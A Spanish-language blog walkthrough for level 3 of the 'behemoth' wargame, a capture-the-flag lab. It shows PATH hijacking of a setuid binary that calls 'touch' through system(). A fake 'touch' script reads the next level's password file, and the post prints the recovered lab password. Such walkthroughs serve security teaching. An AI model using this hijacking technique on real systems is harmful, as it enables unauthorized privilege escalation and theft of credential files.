systemadmin.es > Programación > Wargame behemoth: nivel 3

Wargame behemoth: nivel 3

Este nivel del wargame behemoth se parece mucho al nivel 4 del wargame IO de smash the stack. Consiste en alterar la variable de entorno PATH para modificar el comportamiento de un binario que realizar una llamada al sistema mediante system()

all of this has happened before and will happen again

all of this has happened before and will happen again

Como no disponemos del código fuente tenemos que primero analizar el comportamiento:

level3@behemoth:~$ /wargame/level3
touch: cannot touch `2022': Permission denied

Como que estamos situados en un directorio dónde no tenemos permisos de escritura nos ha dado dicho error. Gracias a esto podemos ver que intenta hacer un touch a un fichero llamado como su PID.

A continuación deberemos crear un fichero llamado touch para alterar después la variable PATH para que ejecute nuestro script.

Primero nos desplazamos a un directorio dónde tengamos permisos de escritura y creamos un fichero llamado touch:

level3@behemoth:~$ cd /tmp/jordi
level3@behemoth:/tmp/jordi$ ls
level3@behemoth:/tmp/jordi$ vi touch

Dentro deberemos dejar la instrucción que queremos ejecutar con los permisos del binario, en nuestro caso el cat del fichero dónde se encuentra el password del siguiente nivel:

level3@behemoth:/tmp/jordi$ cat touch
/bin/cat /home/level4/.passwd

A continuación simplemente le damos permisos de ejecución y indicamos mediante la variable PATH que los binarios los busque en el directorio dónde le hemos dejado nuestro touch modificado:

level3@behemoth:/tmp/jordi$ chmod +x touch
level3@behemoth:/tmp/jordi$ PATH="/tmp/jordi" /wargame/level3
Shai#N9b

El listado de soluciones de otros niveles del wargame de behemoth es el siguiente:

Deja un comentario:

XHTML - Tags permitidos:<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>